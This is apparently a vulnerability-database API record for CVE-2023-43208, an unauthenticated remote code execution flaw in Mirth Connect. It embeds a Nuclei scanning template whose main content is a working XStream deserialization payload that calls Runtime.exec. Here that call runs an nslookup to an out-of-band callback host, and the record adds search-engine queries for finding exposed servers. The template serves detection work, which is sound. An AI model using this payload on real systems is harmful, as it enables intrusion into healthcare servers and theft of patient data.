{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-43208/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-43208/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-43208/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-43208/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-43208/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-43208"},"sightings":{"href":"/api/v1/sightings/cve-2023-43208"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-43208.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-43208\n\ninfo:\n  name: NextGen Healthcare Mirth Connect - Remote Code Execution\n  author: princechaddha\n  severity: critical\n  description: Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.\n  impact: |\n    Successful exploitation could result in unauthorized access and potential compromise of sensitive data.\n  remediation: |\n    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.\n  reference:\n    - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html\n    - https://github.com/nvn1729/advisories\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-43208\n    epss-score: 0.82708\n    epss-percentile: 0.99652\n    cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: nextgen\n    product: \"mirth_connect\"\n    shodan-query:\n      - \"title:\\\"mirth connect administrator\\\"\"\n      - http.title:\"mirth connect administrator\"\n    fofa-query: \"title=\\\"mirth connect administrator\\\"\"\n    google-query: \"intitle:\\\"mirth connect administrator\\\"\"\n  tags: packetstorm,cve,cve2023,nextgen,rce,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /api/server/version HTTP/1.1\n        Host: {{Hostname}}\n        X-Requested-With: OpenAPI\n      - |\n        POST /api/users HTTP/1.1\n        Host: {{Hostname}}\n        X-Requested-With: OpenAPI\n        Content-Type: application/xml\n\n        <sorted-set>\n          <string>abcd</string>\n          <dynamic-proxy>\n            <interface>java.lang.Comparable</interface>\n            <handler class=\"org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler\">\n              <target class=\"org.apache.commons.collections4.functors.ChainedTransformer\">\n                <iTransformers>\n                  <org.apache.commons.collections4.functors.ConstantTransformer>\n                    <iConstant class=\"java-class\">java.lang.Runtime</iConstant>\n                  </org.apache.commons.collections4.functors.ConstantTransformer>\n                  <org.apache.commons.collections4.functors.InvokerTransformer>\n                    <iMethodName>getMethod</iMethodName>\n                    <iParamTypes>\n                      <java-class>java.lang.String</java-class>\n                      <java-class>[Ljava.lang.Class;</java-class>\n                    </iParamTypes>\n                    <iArgs>\n                      <string>getRuntime</string>\n                      <java-class-array/>\n                    </iArgs>\n                  </org.apache.commons.collections4.functors.InvokerTransformer>\n                  <org.apache.commons.collections4.functors.InvokerTransformer>\n                    <iMethodName>invoke</iMethodName>\n                    <iParamTypes>\n                      <java-class>java.lang.Object</java-class>\n                      <java-class>[Ljava.lang.Object;</java-class>\n                    </iParamTypes>\n                    <iArgs>\n                      <null/>\n                      <object-array/>\n                    </iArgs>\n                  </org.apache.commons.collections4.functors.InvokerTransformer>\n                  <org.apache.commons.collections4.functors.InvokerTransformer>\n                    <iMethodName>exec</iMethodName>\n                    <iParamTypes>\n                      <java-class>java.lang.String</java-class>\n                    </iParamTypes>\n                    <iArgs>\n                      <string>nslookup {{interactsh-url}}</string>\n                    </iArgs>\n                  </org.apache.commons.collections4.functors.InvokerTransformer>\n                </iTransformers>\n              </target>\n              <methodName>transform</methodName>\n              <eventTypes>\n                <string>compareTo</string>\n              </eventTypes>\n            </handler>\n          </dynamic-proxy>\n        </sorted-set>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'compare_versions(version, \"<4.4.1\")'\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'status_code_1 == 200 && status_code_2 == 500'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body_1\n        name: version\n        group: 1\n        regex:\n          - '(.*)'\n        internal: true\n# digest: 4a0a00473045022100a33dd59b4eaf6faaa725e641d22891e295f7baedf2a2fe36412e5deb7b333b6602200e19b881134ab2b56a126dc69af1bd70799763a285f3f5ed1947fe30231a79b0:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-43208"}